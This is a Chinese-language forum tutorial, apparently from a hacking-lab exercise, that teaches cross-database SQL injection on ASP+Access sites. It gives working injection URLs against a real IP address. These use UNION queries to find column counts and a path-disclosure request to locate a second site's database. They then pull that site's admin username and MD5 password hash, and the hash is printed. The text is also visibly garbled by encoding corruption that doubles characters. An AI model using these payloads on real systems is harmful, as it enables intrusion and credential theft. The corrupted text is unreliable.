歡迎進(jìn)入網(wǎng)絡(luò)安全論壇,與300萬(wàn)技術(shù)人員互動(dòng)交流 >>進(jìn)入 大家還記得mssql的跨庫(kù)查詢吧,其實(shí)在access中也可以實(shí)現(xiàn)2個(gè)數(shù)據(jù)之間的交叉查詢。下面我就給大家介紹下access的跨庫(kù)查詢。 首先讓我們看看在access里是怎樣實(shí)現(xiàn)對(duì)mdb文件進(jìn)行查詢的,我們隨便創(chuàng)建個(gè)空
歡迎進(jìn)入網(wǎng)絡(luò)安全論壇,與300萬(wàn)技術(shù)人員互動(dòng)交流 >>進(jìn)入
大家還記得mssql的跨庫(kù)查詢吧,其實(shí)在access中也可以實(shí)現(xiàn)2個(gè)數(shù)據(jù)之間的交叉查詢。下面我就給大家介紹下access的跨庫(kù)查詢。首先讓我們看看在access里是怎樣實(shí)現(xiàn)對(duì)mdb文件進(jìn)行查詢的,我們隨便創(chuàng)建個(gè)空數(shù)據(jù)庫(kù),對(duì)數(shù)據(jù)庫(kù)D:\daos\db\daidalos.mdb里的admin表的內(nèi)容進(jìn)行查詢,SQL語(yǔ)句為:
|
SELECT * from admin in "D:\daos\db\daidalos.mdb" |
查詢后,成功返回目標(biāo)數(shù)據(jù)庫(kù)里表admin表里的內(nèi)容:
在實(shí)際的asp注射中,要同時(shí)進(jìn)行2個(gè)select,如果大家熟悉php+mysql注射的話,應(yīng)該很容易想到使用union進(jìn)行聯(lián)合查詢,在access里我們照樣可以使用,使用union查詢還有一個(gè)好處就是不要去對(duì)數(shù)據(jù)進(jìn)行一個(gè)一個(gè)字符的去猜,而可以象mysql+php注射一樣直接暴出字段里的數(shù)據(jù)(具體的mix已經(jīng)寫(xiě)了一篇詳細(xì)的文章)。從上面可以看出來(lái)要實(shí)現(xiàn)跨庫(kù)查詢必修要下面2個(gè)條件:
條件1我們可以根據(jù)提示錯(cuò)誤信息來(lái)手工猜解,也可以通過(guò)程序自動(dòng)實(shí)現(xiàn)。
條件2 這個(gè)是個(gè)難點(diǎn),不過(guò)我們可以通過(guò)利用“access暴庫(kù)”來(lái)實(shí)現(xiàn),有人會(huì)說(shuō)既然可以知道數(shù)據(jù)位置,那不直接下載得拉,其實(shí)不然,現(xiàn)在的數(shù)據(jù)庫(kù)一般防止下載,有的根本不web目錄下。
在黑防第四輪實(shí)驗(yàn)室的第一關(guān),就是設(shè)置的2個(gè)asp+access的下載系統(tǒng),一個(gè)是雨點(diǎn)下載系統(tǒng),一個(gè)是盜帥下載系統(tǒng)。 經(jīng)過(guò)測(cè)試 盜帥下載系統(tǒng)可以暴出數(shù)據(jù)庫(kù)但是不讓下載,似乎也沒(méi)什么地方可以注射,而雨點(diǎn)下載系統(tǒng)就是漏洞百出了,數(shù)據(jù)庫(kù)可以暴且可以直接下載,還可以注射。不過(guò)雨點(diǎn)的后臺(tái)很簡(jiǎn)單,沒(méi)什么可以利用的地方,我們的目標(biāo)就放在得到盜帥后臺(tái)密碼上了,下面我就給大家演示下,通過(guò)雨點(diǎn)系統(tǒng)的注射點(diǎn)對(duì)盜帥系統(tǒng)的跨庫(kù)查詢而得到盜帥的后臺(tái)密碼:
我們得知雨點(diǎn)系統(tǒng)的list.asp可以注射,我們先去要得到union里的數(shù)據(jù)表字段數(shù),提交:
|
http://219.237.81.46/yddown/list.asp?id=75%20union%20select%201%20from%20userinfo |
返回:
|
Microsoft JET Database Engine 錯(cuò)誤 '80040e14' 在聯(lián)合查詢中所選定的兩個(gè)數(shù)據(jù)表或查詢中的列數(shù)不匹配。 /yddown/list.asp,行51 |
字段不對(duì),我寫(xiě)了個(gè)perl腳本自動(dòng)猜,(代碼見(jiàn)后)
當(dāng)我們提交:
|
http://219.237.81.46/yddown/list.asp?id=75%20union%20select%201,2,3%20from%20userinfo |
無(wú)錯(cuò)誤返回:
哈哈! 我們已經(jīng)得到字段數(shù)了,并且我們可以得到在字段1的我位置,可以顯示我們查詢的數(shù)據(jù)。
現(xiàn)在還就差盜帥的數(shù)據(jù)庫(kù)位置了,簡(jiǎn)單我們暴庫(kù),提交:
|
http://219.237.81.46/dsdown%5cregs.asp |
成功返回路徑:
|
Microsoft JET Database Engine 錯(cuò)誤 '80004005' 'D:\111\db\kljdsld.asa'不是一個(gè)有效的路徑。 確定路徑名稱拼寫(xiě)是否正確,以及是否連接到文件存放的服務(wù)器。 /dsdown/db/user.asp,行6 |
(注意:這樣得到的的路徑不一定是“完整”的,真正的路徑為:D:\111\dsdown\db\kljdsld.asa)
下面我們跨庫(kù),構(gòu)造url如下:
|
http://219.237.81.46/yddown/list.asp?id=75%20union%20select%20admin,3,2%20from%20admin%20in%20"D:\111\dsdown\db\kljdsld.asa"%20where%20id=1 |
上面的語(yǔ)句是,union查詢數(shù)據(jù)D:\111\db\kljdsld.asa里表admin里id=1的字段admin的數(shù)據(jù),如果成功將直接暴出后臺(tái)管理的用戶名:
得到用戶名為admin 我們接著暴密碼:
|
http://219.237.81.46/yddown/list.asp?id=75%20union%20select%20pws,3,2%20from%20admin%20in%20"D:\111\dsdown\db\kljdsld.asa"%20where%20id=1 |
如圖:
得到密碼為32位的md5加密的hash:77e6cbb3f9468eadb655ae6826357922,我們跨庫(kù)查詢成功,這里我只是為大家演示下跨庫(kù)查詢,黑防那里就不管咯 : )。
小結(jié)
本文主要是給大家介紹了2個(gè)非常有用的方法,第1 我們?cè)赼sp注射時(shí)不一頂要一個(gè)個(gè)字符去猜,那樣遇到中文的很麻煩,直接用union替代數(shù)據(jù)可以直接暴出數(shù)據(jù),不關(guān)是中文還是特殊字符,都可以一步到位,第2 就是跨庫(kù)了,使用很靈活,可以讓你在滲透時(shí),有意想不到的收獲。
聲明:本網(wǎng)頁(yè)內(nèi)容旨在傳播知識(shí),若有侵權(quán)等問(wèn)題請(qǐng)及時(shí)與本網(wǎng)聯(lián)系,我們將在第一時(shí)間刪除處理。TEL:177 7030 7066 E-MAIL:11247931@qq.com
Copyright ? 2019-2025 51dongshi.com 版權(quán)所有
違法及侵權(quán)請(qǐng)聯(lián)系:TEL:177 7030 7066 E-MAIL:11247931@qq.com 本站由北京市萬(wàn)商天勤律師事務(wù)所王興未律師提供法律服務(wù)
